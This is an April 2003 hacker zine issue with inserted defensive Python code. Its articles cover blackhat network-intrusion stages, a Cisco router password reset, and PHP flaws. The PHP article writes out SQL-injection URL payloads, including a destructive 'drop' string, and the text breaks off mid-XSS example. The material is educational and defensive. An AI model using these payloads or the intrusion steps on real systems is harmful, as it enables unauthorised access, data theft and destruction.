.:The Digital Edge - Editor's Note:.

TDE is a submission-based zine brought to you by hackingzone.org, nitesecurity.com, and various interested parties. The editors of TDE aim to create a zine where innovators and researchers of the digital underground scene can report their findings and share knowledge. If you are interested in contributing to the zine or learning more about it, visit http://www.hackingzone.org/tde/

*Debut Issue*

+111111111111111111111111111111111111111111111111111111111111111+
+000000000000000000000000000000000000000000000000000000000000000+

April 2003

IN THIS ISSUE

Anatomy of an Attack : Modest................................
Cisco Password Recovery : Kayin..............................
PHP Security Issues : nwo....................................
Virtual Machines : Agni......................................
Game Copy Protection : Agni..................................
Java Security : 0versight....................................
A New Addition to your Beige Box : Colt45 and wizbone........
Platform Independence : Agni.................................

+00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000+
+11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

..........................................................................
Anatomy of an Attack: Overview of How Blackhats Break Into Networks
By modest
..........................................................................

In order to understand how to prevent attacks, network administrators must understand the methodologies that blackhats use. Throughout this document, the word "blackhat" will refer to a hacker who uses their knowledge to illegally penetrate a network. The network under attack can be part of an organization, a government agency, or a company. In order for an attack to be successful and efficient, the blackhat will follow distinct steps. The following is a rough description of the sequential stages in an attack:

Getting anonymous
Passive information gathering & reconnaissance
Footprinting the network
Preliminary scanning
Identifying a single host to target
Penetrating firewalls and avoiding IDS
Attacking from remote - gaining shell access
Privilege escalation
Compromising the network
Covering tracks

1. Getting Anonymous

Before any active scanning can begin (and in some cases, before some passive network footprinting), blackhats will wisely try to obfuscate their trails on the internet. There are various methods one can use to hide their identity, and the most effective strategy is to mix different methods. The more methods used, the less chance of being tracked, but bandwidth can decrease and connection loss becomes more likely.

-Connections can be bounced through proxies and wingates. Proxies and wingates are used to forward connection requests and bounce connections, usually to facilitate access between networks.
Proxies are often used by companies to set up internet access for computers on a network, but many are misconfigured and allow outsiders to use them to bounce. Also, many privacy groups set up proxies so that your web browsing can be bounced through them to protect your identity. A proxy consists of a computer running a proxy server. Wingates are similar, but they allow for the bouncing of a telnet connection. Typically, an attacker will chain several proxies. Proxies can be scanned for with tools like Proxyhunter for Windows, or can be obtained from lists that people submit to on the internet. Usually a misconfigured proxy will go down soon after being publicized because it will be abused.

Proxyhunter can be found at http://www.proxys4all.com/tools.shtml
A proxy list can be found at http://www.cybearmy.com/lists/
and http://www.multiproxy.org/anon_proxy.htm

-Misconfigured and/or insecure wireless LANs could allow an attacker to tap into the network (from across the street) to get free internet access. A blackhat could simply park a car across the street from a building with one such network and get free internet access.

-Cracked shell accounts (accounts on a Unix/Linux server that allow users to log in, store files, and send mail) can be used in the chain also. The attacker will log in to the cracked account and then continue the chain from there, or use the shell as the last in the line in order to compile and run attack tools from that shell.

-An acoustic coupler is a device that turns modem signals into sound so that they can be played into a phone receiver. Example: a hacker can use a payphone to dial up to an ISP like NetZero and use a cracked account. The downside of this is that the bandwidth is very low.

-A blackhat could scan an ISP's cable/DSL subnets looking for computers that are infected with Sub7, NetBus, or other remote access trojans and route the attack through them.
Sub7 specifically allows for port forwarding of traffic, which is perfectly tailored for just this use. Smarter blackhats will bounce connections between countries at war or with different languages so that it takes longer to trace back each bounce, hoping that one administrator will have deleted their connection logs by the time they are notified that their system was part of the chain used by a blackhat.

2. Gathering Information - Passive reconnaissance and public databases

The first thing a blackhat can do is data mining from websites, using tools that crawl HTML looking for any useful information: links to other sites within that organization, email addresses, phone numbers, names, geographic information on the network, etc. There are many free programs that will cache an entire internet site locally.

In the case of attacking a known registered domain (like www.whatever.com), public databases like ARIN and InterNIC are very useful for finding out information about registered domains that belong to the organization. Whois and nslookup, run from the command line, are examples of tools that query such databases. Finding IP blocks registered to the company will give clues about the size of the network. A zone transfer from a misconfigured DNS server within the network will hand all of its DNS records to the attacker, providing a gold mine of information on what the different hosts on the network are used for. Reverse DNS resolution of IP blocks will give clues as to what those hosts are used for. www.samspade.org is a collection of online tools that can get information from public databases.

2.5 Social Engineering

The blackhat may consider social engineering at this stage and at any other point in the attack. This would involve contacting people within the organization via phone or email, usually fraudulently, in order to get information out of them that would help the blackhat (passwords, etc.).
Example: recently I read about someone who called AOL and pretended to have had jaw surgery. They instructed the service personnel on the other end of the line to repeat everything that they said during the call, so that they could be sure they were being heard correctly. They were asking for a password for an account, and whenever the AOL person would ask for information like name or address, they would mumble a string of meaningless garbage; the AOL person would assume they were saying the right information and repeat back to them information that actually was correct. After a few phone calls like this, the person had enough information to call and get the password changed without mumbling.

3. ICMP scanning

Once a general idea of the size and setup of the network is achieved, scanning can begin on the more "interesting" IP blocks - ones that have interesting reverse DNS names, for example. ICMP scanning is a method of determining which hosts on the network are alive and not behind firewalls, and it involves pinging entire IP ranges. An intrusion detection system can detect IP range scanning and implement a firewall ruleset that will block all traffic from the offending source. A traceroute to IP addresses within the netblock that are behind firewalls will show where the firewall is located and can also be used to footprint the network and find interesting hosts. Once a list of live, interesting hosts is achieved, attacking can begin.

4. Focusing on one computer - Port scanning

Port scanning is the process of sending packets to ports on a host to determine what services are being run. For example, a port scan on a computer that is hosting a website would probably reveal a web server running on port 80; port 80 is the standard port for web servers, and your web browser will always check port 80 for the web server unless you tell it otherwise.
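Sections 3 and 4 describe sweeps and port scans from the attacker's side. From the defender's side, the IDS rule the text mentions amounts to counting how many distinct hosts (for ICMP) or distinct ports on one host a single source touches within a short window. The Python below is an added example written for this edition of the article, not code from the author or from Nmap, Superscan or any IDS; the log format is a constructed, simplified firewall log, and the thresholds and the 60-second window are assumed values that a real deployment would tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (constructed for this example, not any real firewall's):
#   <ISO timestamp> <src_ip> -> <dst_ip>:<dst_port or "icmp"> <ACCEPT|DROP>
HOST_THRESHOLD = 8           # distinct hosts probed by ICMP from one source
PORT_THRESHOLD = 8           # distinct ports probed on one host from one source
WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Split one log line into (timestamp, src, dst_host, dst_port, action)."""
    ts, src, _arrow, dst, action = line.split()
    host, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, host, port, action


def detect_scans(log_text, host_threshold=HOST_THRESHOLD,
                 port_threshold=PORT_THRESHOLD, window=WINDOW):
    """Return sorted (src_ip, kind) findings.

    "icmp_sweep": one source pinged >= host_threshold distinct hosts inside `window`.
    "port_scan":  one source touched >= port_threshold distinct ports on a single
                  host inside `window`. Only connection attempts are counted, so a
                  half-open (SYN-only) scan is caught as readily as a full connect.
    """
    events = defaultdict(list)           # src -> [(ts, host, port), ...]
    for line in log_text.splitlines():
        if line.strip():
            ts, src, host, port, _ = parse_line(line)
            events[src].append((ts, host, port))

    findings = set()
    for src, evs in events.items():
        evs.sort()
        # slide a window starting at each event of this source
        for i, (t0, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - t0 <= window]
            icmp_hosts = {h for _, h, p in in_window if p == "icmp"}
            if len(icmp_hosts) >= host_threshold:
                findings.add((src, "icmp_sweep"))
            ports_by_host = defaultdict(set)
            for _, h, p in in_window:
                if p != "icmp":
                    ports_by_host[h].add(p)
            if any(len(ps) >= port_threshold for ps in ports_by_host.values()):
                findings.add((src, "port_scan"))
    return sorted(findings)


def build_sample_log():
    """Constructed traffic: an ICMP sweep of a /24, a port walk on one host, and
    one ordinary client (web and mail) that must not be flagged."""
    base = datetime(2003, 4, 1, 10, 0, 0)
    lines = []
    for i in range(12):                                  # sweep: 12 hosts in 12 s
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} "
                     f"203.0.113.7 -> 198.51.100.{i + 1}:icmp DROP")
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 139, 143, 443]):
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} "
                     f"203.0.113.9 -> 198.51.100.5:{port} DROP")
    lines.append(f"{base.isoformat()} 203.0.113.20 -> 198.51.100.5:80 ACCEPT")
    lines.append(f"{(base + timedelta(seconds=3)).isoformat()} "
                 f"203.0.113.20 -> 198.51.100.6:25 ACCEPT")
    return "\n".join(lines)


if __name__ == "__main__":
    for src, kind in detect_scans(build_sample_log()):
        print(f"{src}: {kind}")
```

Counting per source is exactly what the proxy chaining of section 1 is meant to defeat: a scan spread over several bounces looks like several slow sources. A second rule keyed on the destination (many distinct sources touching one host's closed ports) catches that case, at the cost of more false positives on busy servers.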
Randomizing the port scan source through different proxies, using dummy packets, and using only a partial TCP connection can avoid detection by intrusion detection systems. Nmap is the most powerful port scanner out there, offering a multitude of scanning options, including a huge database of information that helps detect what operating system the host is running during the port scan (called OS fingerprinting). Knowing the operating system is vital in order to decide how to attack it. Nmap is open source and free, and a version for Windows was recently ported. It can be found at insecure.org. Superscan is a decent Windows port scanner that is simple to use, although it doesn't offer any of the advanced features that Nmap does. It can be found at www.foundstone.com

5. Options of attack

Once the operating system is known and the blackhat has a list of open ports, the blackhat will begin to focus his attention on finding the weakest link into the system. Since a blackhat is only concerned with access and not with securing the system, they only need to find one way in, making their goal significantly easier. There are two main ways that the blackhat can attempt to gain access:

-Brute forcing, attempting a dictionary attack, or trying default passwords against a login service.

-Using an exploit on an insecure service running on a certain port to gain access directly, or to gain access to password files that can be cracked.

6. Breaking passwords remotely

Login services that provide shell access to users are often the targets of brute forcing/dictionary attacks. A user logging in to a telnet server, which usually runs on port 23, will have to know a username and password in order to get access to their account. Brute forcing is often a time-consuming and implausible process that involves testing random characters in a systematic way in order to eventually guess the password.
It becomes especially difficult if the username is unknown as well, because the brute forcing program will have to guess both the username and the password correctly in order to break into an account. Dictionary attacks involve trying a list of words as passwords and are far more plausible because weak passwords are very common; they can be a critical security problem if there are many users, because there is a good chance that one user will have a weak one-word password. That is all it takes for the blackhat to be well on the way to gaining root (administrator) access to the system. Brute forcing and dictionary attacks are often avoided by blackhats because multiple failed logins can cause intrusion detection systems to notify administrators that the network is under attack.

Brutus is a solid Windows remote brute forcer that allows for brute forcing and dictionary attacks. It can be found at: http://www.hoobie.net/brutus/index.html

7. Exploits

There are many different types of vulnerabilities and methods of exploiting a service. When programmers develop their software, they often overlook proper coding principles that ensure that their software is secure. Browsing www.securityfocus.com will show how many serious security flaws were discovered recently in various software for various platforms.

A blackhat will look at the list of open ports on a system and attempt to learn as much about each service behind them as possible: who the vendor is, what it is used for, and what version it is. This can be done by grabbing banners - using telnet or netcat to connect to a port and see how the service responds (telnetting to my own FTP server reveals that I am running BulletProof FTP Server). They can then search the internet using google.com and exploit search engines to see if any vulnerabilities exist in that software for them to employ. An example of a serious security flaw that is found in many FTP servers is the directory traversal attack.
Example: anonymous FTP access is granted to the public on a company's FTP server so that customers can download the latest drivers and software patches. A blackhat discovers that the FTP server is outdated and that the version being run has a directory traversal vulnerability. He finds proof-of-concept exploit code that someone has written and posted on the internet and uses it to look at folders outside of what the public was meant to be restricted to. He changes his directory from ./public/drivers/ to /etc/shadowed/ and downloads the encrypted password file for the administrator's telnet login so he can crack it and log in as the administrator.

This is one example of many types of remote exploits. Blackhats who are extremely skillful can scour binaries in closed-source software and source code in open source software to develop their own exploits if confronted with a server that has no known vulnerabilities. There are even tools that will attempt common vulnerabilities against the server itself.

8. The password file

Oftentimes, through use of an exploit, a blackhat may not be able to gain an account immediately but instead may just have file read access to the server and be able to download a password file. There are many programs out there to crack various password files, using optimized algorithms to speed up brute forcing and dictionary attacks against the hashed passwords. A password file cannot simply be decrypted, because what it stores is not the password but a one-way hash derived from it. Hence, the only way to discover a password is to hash candidate passwords until one produces the same hash as the one in the file. John the Ripper is one of the many free, open source password crackers made to crack weak Unix password files using various methods. It can be found at http://www.openwall.com/john/ Furthermore, if many password files have been downloaded, it becomes increasingly easier to find one with a weak password.
All it takes is one weak password to allow the blackhat to get a foot in the door.

9. Privilege Escalation

Once an account has been secured by the blackhat, they may need to escalate their privileges so that they have root access: total control over the system. One of the most effective methods of gaining root access is using a buffer overflow in a function. Buffer overflows are advanced techniques and their discussion is beyond the scope of this presentation. Basically, if certain commands and functions available to the user are not protected from memory manipulation by the blackhat, then by abusing the stack memory of the function the blackhat can turn an ordinary restricted account into root. The blackhat can use their knowledge of the operating system to look on the internet for known buffer overflows in the functions available to them, or even attempt to discover their own.

10. Taking Over

One of the first things a blackhat will do once they've gotten root access is install a rootkit. Rootkits are tailored specifically for certain operating systems and certain setups, and they modify critical operating system files and the system kernel itself in such a fundamental way that the presence of the blackhat at any given point is completely hidden, even from security measures themselves. There are tools used to combat rootkits such as Tripwire (www.tripwire.com), and the blackhat may have to circumvent such security measures as well. They may also create a backdoor on the rooted system: a simple, guaranteed entrance so that the blackhat can return at another point.

11. Scouting the Network

At this point the blackhat may not be satisfied with compromising the one system and may want to get deeper into the network. Because they can now launch attacks from a system within the network, they may have a higher level of trust and can pass packets through firewalls that would normally be problematic for connections from a source outside of the network.
In this sense, there are probably more hosts that can be targeted.

Sniffing becomes a huge issue at this point. By putting the network interface card into promiscuous mode, the compromised system will listen to all traffic passing by it on the network. Since Ethernet works by broadcasting data to every machine on the line and not just the one it's addressed to, a sniffer may be able to pick up sensitive information, including encrypted and plaintext passwords. Powerful, freeware, open-source sniffers are available for just about any operating system. Dsniff is a tool that is used to sniff certain protocols out - telnet, FTP, SSH - and store the important information being passed through them as it is transmitted on the line.

Ettercap is described by its website as "a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis." http://ettercap.sourceforge.net/

Ethereal is described on www.ethereal.com as "a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, viewing summary and detail information for each packet. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session."

Sniffing is a very serious security risk and is also very difficult to detect.

ARP poisoning is another technique used by blackhats once they've penetrated a network. This involves sending spoofed ARP packets to a host on the network in order to poison its ARP table. ARP tables are stored on each host on a network, and they map IP addresses to MAC addresses.
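Because every host keeps its own IP-to-MAC table, the practical defence against poisoning is to watch the ARP replies on the wire and alert when a mapping changes, or when one MAC starts answering for several IPs. The Python below is an added example for this edition of the article, not the author's code and not arpwatch or any other tool the article names; the list of ARP replies is constructed, in the order a monitoring host would see them.

```python
def watch_arp(replies, known=None):
    """Process (sender_ip, sender_mac) pairs from observed ARP replies.

    Returns (table, alerts): `table` is the IP -> MAC mapping as currently believed,
    and `alerts` lists (ip, old_mac, new_mac) every time an IP that was already
    mapped shows up with a different MAC, which is what poisoning looks like from
    the victim's side. `known` seeds the table (e.g. from a static inventory) so
    the very first spoofed reply for a known host is caught as well.
    """
    table = {ip: mac.lower() for ip, mac in (known or {}).items()}
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()                  # compare case-insensitively
        old = table.get(ip)
        if old is not None and old != mac:
            alerts.append((ip, old, mac))
        table[ip] = mac                    # record what the wire currently claims
    return table, alerts


def shared_macs(table):
    """MACs that answer for more than one IP: a second signature of poisoning,
    since a host impersonating the gateway usually keeps its own address too."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed sample: 10.0.0.1 is the gateway; partway through, a station with
# MAC aa:bb:cc:dd:ee:99 starts claiming the gateway's IP and then a second one.
SAMPLE_REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:01"),
    ("10.0.0.5", "00:11:22:33:44:05"),
    ("10.0.0.7", "00:11:22:33:44:07"),
    ("10.0.0.1", "00:11:22:33:44:01"),    # normal refresh, same MAC: no alert
    ("10.0.0.1", "AA:BB:CC:DD:EE:99"),    # gateway IP now claimed by another MAC
    ("10.0.0.5", "aa:bb:cc:dd:ee:99"),    # same rogue MAC claims a second IP
]


if __name__ == "__main__":
    table, alerts = watch_arp(SAMPLE_REPLIES)
    for ip, old, new in alerts:
        print(f"ALERT {ip} changed from {old} to {new}")
    for mac, ips in shared_macs(table).items():
        print(f"ALERT {mac} answers for {', '.join(ips)}")
```

A monitor like this only sees what reaches its own segment, and a legitimate change (a replaced NIC, a failover of the gateway) will also trip it; the usual practice is to alert and let an operator confirm rather than to block automatically.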
By causing a target system to change its ARP table, you can redirect traffic between computers on the network through the compromised system first, by fooling a host into thinking that the compromised system's MAC address is associated with a certain IP address.

12. What next?

Now, the blackhat can either dig deeper into the network or sit on the compromised system. They can steal information from it. They can change a website that is stored on it. They can use the system as part of a distributed denial of service attack against another system. They can change publicly downloaded files stored on that system and bind them with viruses. They can use it as part of a chain in the next attack. The possibilities are scary and real.

-modest
www.caveatabacus.0catch.com

+11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

Cisco Password Recovery
by Kayin

Table of Contents
---
Introduction
The Cisco IOS
Basic modes of the IOS
The configuration register
Step by Step Password Recovery
Conclusion
---

--- Introduction ---

Ever since computers were invented, people have wanted a way to make them easier to use and easy to adapt to take over some of the grueling tasks of life that a majority of people really just don't want to do. To make this happen, communication between machines is a necessity. Out of necessity comes invention, and the "network" was born. Today, as we all know, networks are connected to other networks which are connected to even more networks. Altogether we have one big network made up of smaller networks that we like to call the internetwork, or just the internet. Routers are the fundamental backbone of the internet. They single-handedly make the internet possible. This is true because routers are the only machines that can completely separate one network from another network and still allow them to communicate back and forth.
A switch cannot replace a router, even if it is running VLANs (virtual local area networks). This is mainly because a router deals with layer 3 (the network layer) of the OSI model. What does that mean? Well, a switch only goes to layer 2 (the data-link layer) of the OSI model, which fundamentally deals with the hardware addresses of individual nodes and workstations. A switch keeps a cache of these individual nodes for communication on a local network. A router basically keeps track of the network addresses of these LANs and routes information from one LAN to another LAN. The primary difference between a switch and a router is that a switch keeps track of the individual workstations, and a router keeps track of where these switches are so it can pass information to the switch, which will then give it to the workstation. Since a switch is so locally oriented, it cannot do the work of a large-scale router sufficiently to actually be used in the workplace.

--- The Cisco IOS ---

80% of the internet is owned by a company called Cisco. Cisco makes hubs, switches, and of course routers. They have the reputation of making the best routers. If you were to do a traceroute to www.aol.com, chances are 80% of the routers you go through were made by Cisco. Cisco has several different families of routers that are based on the bulk of what they can handle. The 2500 series routers are good learning routers and are relatively cheap. 7000 series routers are about the size of a large server, are used for backbones of mid-sized companies, and can cost upwards of a few hundred thousand dollars. The 12000 series is the largest family of routers so far. They are massive internet backbones and cost well over one million dollars.

Routing is basically getting a packet from network A to network C. To get from network A to network C, you must pass through network B. That's what a router is for.
It takes the packets coming in from A, looks at their addresses, sees that they need to get to network C, and then sends them to point C. It's a fairly simple process. Unfortunately, routing a packet through a small digital universe is no longer simple. Do a traceroute to a server in Italy and you're going to pass through a lot of routers. For this reason, all routers are built to operate in complex and large environments where there are no standards. This makes all of your routers very versatile but very difficult to configure.

Due to the difficulty in configuration, Cisco decided to make software to run on a router to be fully configurable in any environment. They ended up with an operating system called the Cisco Internetworking Operating System. This operating system's sole purpose is routing. So don't let the fact that it's called an operating system scare you away. The IOS is fairly easy to use; however, it has a command line interface (CLI). For the CLI-impaired: it has no pretty pictures, you type everything out. It's similar to DOS except with no directory hierarchy. The router administrator performs all actions through either a serial console session or, most commonly, through a terminal session (telnet).

Note: Before you start thinking "oh telnet, I'm a 1337 haxor and I smell an easy hack", keep in mind that Cisco is not Microsoft and therefore they possess some intelligence regarding very obvious things. That, and Cisco admins are very..possessive..with their routers; they get a little more upset when you try to get into their routers...I've noticed from, um, experience.

--- Router Modes ---

To perform password recovery on a router, it would at least be wise to know the modes that a router can be in. In the case of simple router usage and password recovery, there are 5 modes you need to be aware of.
-Setup Mode
-User Exec Mode
-Privileged Mode (enable mode)
-Configuration Mode
-ROM Monitor Mode

The very first time you boot up the router, or any time the router doesn't find a configuration file in the NVRAM (non-volatile random access memory, kind of like a router's hard drive), it will go into Setup mode, which is there to help you set up the configuration file. It asks you what protocols you want to enable and all that fun stuff. It's kind of like a survey, very easy to use, and has no other purpose.

When you first log into the router, you will be put in User Exec Mode. In this mode, you can't do much at all. It exists for security reasons. In this mode, you can look but not touch, meaning it'll allow you to view certain setups and configurations. It doesn't allow you to view sensitive configurations (configurations displaying set passwords, for instance) and definitely does not allow you to edit anything at all.

Privileged Mode, or enable mode, is the admin mode. It allows you to access the configuration mode and shows you everything. It requires an encrypted password to access this mode. This password is the one being recovered in this article.

Configuration mode is a special mode that allows you to edit various lines of the router configuration. You pretty much change everything in this mode.

ROM Monitor mode is a mode that has basically 2 uses: troubleshooting and password recovery. In the typical workplace you'll never use this mode, and because of that, a lot of people tend to completely forget about it. It's also a real pain in the butt to access because you have to change the configuration register upon bootup to even access it. Routers rarely even get rebooted, due to the fact that when rebooting a router you take down your access to the internet, as well as communication to other networks, which can result in serious problems as well as a lot of phone calls to your office. But, of course, severity all depends on your network design.
--- Configuration Registers ---

The configuration register is a 16-bit software register built into each router. In English, it's a set of bootup options that you can set to modify how the router boots up. Since it's 16 bits, there are 16 options that you set in binary. On older routers they are jumpers on the board of the router itself. On newer ones they are software. They're set in binary, but since there are 16 bits, we can simply set the value in hex and accomplish the same thing more quickly.

--------------------------------------------
15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0   - options (config register bits)
 0  0  1  0  0  0  0  1  0  0  0  0  0  0  1  0   - whether each option is chosen or not
--------------------------------------------
(options that have value 1 are chosen to load)

Each option is set to determine what is loaded upon booting. Since in the Cisco IOS you have to enter the register in hex, using the table above you have to convert from binary into hex. If you can't, the Windows calculator can. The above configuration reads 2102, which is the router default. Most of the configuration register bits deal with where the IOS will be booted from: a TFTP site, flash memory, ROM, or just NVRAM. That is not relevant to this article and thus is not included.

--- Step by Step Password Recovery ---

Cisco routers use a lot of passwords to emphasize security. Off the top of my head, there is a password for console connections, one for terminal connections, and there are 2 passwords for entering enable mode: the general enable password and then the enable secret password. The enable password is overridden by the enable secret password, which is also encrypted.

Note: While in enable mode you can view all passwords except the enable secret password in plain text by showing the current running configuration using the command "show running-config" (can be useful if you have access to a router when the admin walked away without logging out).
1. First and foremost, you have to get the router to a state where you can change its configuration register. At the command line you can use the command config-register. You can also reboot the router and hit the break key. The break key varies between different routers, so you might have to do some research. (Hint: www.cisco.com)

2. If you hit the break key, it'll dump you in ROMMON mode, but it will have loaded some of the NVRAM already, meaning you can't change the password yet. What you have to do is change the config register using the command "confreg" or "o/r 0x2142". Then reload the router using the command "reload" or "initialize", depending on the router series. Note: since the config register is written in hex, you have to place a 0x in front of the register value you choose to specify. Also, to boot to ROMMON without loading part of the startup config from NVRAM you need the register 2142. Refer to the table in the last section to see which bits are activated by that hex number.

3. When the router has reloaded in the appropriate mode, it will ask you if you want to run Setup mode to build a new router configuration. If that's what you want to do, then be my guest; if not, then don't.

4. If you choose not to run setup mode and build a new configuration, then it will dump you to a prompt. To change the enable password you have to be in privileged mode. Use the command "enable" to access privileged mode. Since you booted up the router without its previous configuration there will be no enable password prompt, just as there will be no configuration for routing.

5. Since there is no configuration for routing, specifying a new enable password and saving your configuration just like that will do nothing more than irritate you or the admin and totally negate the purpose of changing the password. What you want to do is load a working configuration with your own passwords. The easiest way to do that is to load the previous configuration from NVRAM.
Use the command "copy startup-config running-config" to restore the previous configuration. You might say, wait, if you restore the previous configuration won't the passwords come back? The answer is yes, they will, but you're already logged in under enable mode anyway, so it doesn't matter.

6. Since you're logged in under enable mode and have restored the previous configuration, you can now reset the enable password by using the command "enable secret [password goes here]".

7. The most common thing here is that people forget to save their work. Use the command "copy running-config startup-config" to save what you did back to the NVRAM for the next time you boot up.

8. Change the config register back to 0x2102 (the default) and reload the router.

Congratulations, you have just recovered the enable password of a Cisco router.

--- Conclusion ---

In summary of what just happened, we reset the router to boot differently than normal. Normally routers boot up and perform a POST, then run the bootstrap code from ROM (which is what we altered), then the router finds the IOS in the place that the configuration register designated in the bootstrap, then loads the router configuration file, which is usually found in NVRAM (non-volatile random access memory, which is a router's hard drive). What we did is tell the router to boot a fresh copy of the IOS and bypass the NVRAM's configuration file. That was built into the router for troubleshooting in case the NVRAM became damaged; we used it to bypass the enable password. Pretty convenient, huh?

-Kayin

+11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+

PHP Security Issues !
by nwo

I don't write long articles or elaborate on them perfectly, but I will try my best here to explain some of the pretty common PHP errors. This article will cover:

1. Danger due to global variables
2. SQL Injection Attacks
3. Cross-site scripting attacks
4.
Some other essential issues 1. Danger due to global variables - In php.ini file, there is one variable called "register_globals". If it's turned on, all the variables of array $_POST[],$_GET,$_COOKIES,$_SESSIONS are available directly. That means you can use them just like local variables. Initially it doesn't look like a big problem. But if you are not an experienced php programmer, it may create some havoc. Consider the following example : Here if, register_globals is turned on, user can change the value of the variable $valid. So if someone enters http://www.yoursite.com/user.php?valid=1 then he would easily by-pass the authentication beacuse the variable $_GET[valid] will be available as $valid. This problem is more of the intialization problem then of register_globals. If the file is written as following, then it won't be of any trouble even if register_global is on. The easiest way that I can think of combining ease of register_globals off and security is to have a set of initializer at the top of the file like.. $name=$_POST[name]; $email=$_POST[email]; 2. SQL Injection Attacks We all love to use database to build our sites. It really provides us a lot of power. But SQL can be receipe for a disaster. If you don't take much care while writing your PHP Scripts that deals with database, it could create some real serisous trouble. Consider the following example : $query="SELECT * FROM info WHERE city='$_GET[city]'"; The URL would look something like http://www.hackingzone.org/inject.php?city=newyork Now if I want to get details for city called "london", then I enter the URL as < http://www.hackingzone.org/inject.php?city=newfake' OR city='london' > And guess what, you will get the details of the london city ! This happens because query becomes something like, $query="SELECT * FROM info WHERE city='newfake' OR city='london'"; Now there doesn't exist any city called newfake and you get the detalis of the london city. 
Here one would have to guess a few details about the database table, because it was a pure guess that the field in the database is also called "city". If it was something like "cityname", then I would have to enter

    http://www.hackingzone.org/inject.php?city=newfake' OR cityname='london'

and if I wanted to get the details of all the cities, I could have entered

    http://www.hackingzone.org/inject.php?city=newfake' OR 1=1

Then the query will select all the rows of the table. Or, well... suppose you want to select the first entry of the database? It's rather simple guessing here, because the primary key field is usually named id or something related to the table id, like cityid or countryid. You could enter a URL like

    http://www.hackingzone.org/inject.php?city=' OR id=1--'

Do you notice the --' at the end? It is there to comment out the rest of the query in MySQL. The query would look like

    $query="SELECT * FROM info WHERE city='' OR id=1--'";

And the worst thing that one could really do is this:

    http://www.hackingzone.org/inject.php?city=;drop db database

While dealing with numbers, you should check whether the input is a number or not. You can check it with the is_numeric($var) function. Wanna try your hands somewhere? Play the hackingzone.org wargame made by lifofifo called "X-Mall", where you have to use SQL injection techniques to get the credit card details of Bill Gates.

One good example of SQL injection is in phpBB 2.0.3. The SQL injection is in the inbox.php file. It's possible to delete all the private messages in the database using one simple SQL injection technique. The solution is to upgrade to phpBB version 2.0.4. There are several SQL injection exploits for phpNuke as well.

To prevent SQL injection attacks, PHP does provide some good functionality. In the php.ini file there is a variable called "magic_quotes_gpc". If it is turned on, PHP will automatically add slashes to GET, POST and cookie data. It is usually a must to turn on that variable.
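The injections above, worked through as an added example that is not from the article: Python with sqlite3 stands in for PHP and MySQL, the `info` table (id, city, details) is constructed here, and the parameterised lookup shown beside the string-built one is the modern counterpart to the escaping the article recommends.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the article's `info` table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE info (id INTEGER PRIMARY KEY, city TEXT, details TEXT)")
    con.executemany(
        "INSERT INTO info (city, details) VALUES (?, ?)",
        [("newyork", "NY details"), ("london", "London details"), ("paris", "Paris details")],
    )
    return con


def lookup_vulnerable(con, city):
    """Mirrors $query="SELECT * FROM info WHERE city='$_GET[city]'";
    the user value is pasted straight into the statement text."""
    query = f"SELECT id, city FROM info WHERE city='{city}'"
    return con.execute(query).fetchall()


def lookup_safe(con, city):
    """Same lookup with the value bound as a parameter: the engine never
    parses it as SQL, so a quote inside it cannot close the string."""
    return con.execute("SELECT id, city FROM info WHERE city=?", (city,)).fetchall()


def lookup_by_id(con, raw_id):
    """The article's is_numeric() advice for numeric inputs: refuse anything
    that is not a plain integer before it gets anywhere near the query."""
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    return con.execute("SELECT id, city FROM info WHERE id=?", (int(raw_id),)).fetchall()


def demo():
    """Run the article's payloads through both lookups and collect the results."""
    con = make_db()
    out = {}
    out["honest"] = lookup_vulnerable(con, "newyork")
    # newfake' OR city='london  ->  WHERE city='newfake' OR city='london'
    out["or_city"] = lookup_vulnerable(con, "newfake' OR city='london")
    # ' OR id=1--'  ->  WHERE city='' OR id=1--'   (-- comments out the last quote)
    out["comment"] = lookup_vulnerable(con, "' OR id=1--'")
    # newfake' OR 1=1 as printed in the article leaves the closing quote
    # dangling, so the engine rejects the statement instead of running it
    try:
        lookup_vulnerable(con, "newfake' OR 1=1")
        out["or_1eq1"] = "ran"
    except sqlite3.OperationalError:
        out["or_1eq1"] = "syntax error"
    # the same strings bound as parameters match no city at all
    out["safe_or_city"] = lookup_safe(con, "newfake' OR city='london")
    out["safe_comment"] = lookup_safe(con, "' OR id=1--'")
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```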
Alternatively, you can use PHP's addslashes() and stripslashes() functions. addslashes() adds slashes to the variables. You can use it like below before using the variable in a query:

    $name = addslashes($name);

If you are inserting the user's input into the database, then the slashes will also be saved in the database. To remove the slashes after retrieving it from the database, you can use the stripslashes() function in the same manner as addslashes().

3. Cross-site scripting attacks

These attacks are known as XSS. That's not CSS, because CSS was already something at the time these attacks became famous. XSS is mainly about hijacking some other user's session by stealing his/her cookie. When some site has poor user input filtering, these attacks occur. Take a bulletin board for an example. If the user's input is unfiltered, then the user can enter malicious HTML tags and JavaScript to steal some other user's cookie. Let's consider a simple example: there is a bulletin board, and it's storing the username and password in a cookie. Now if some malicious user posts something like..

    This is my first GIF avatar !! Move your mouse Over Here !

This would appear as:

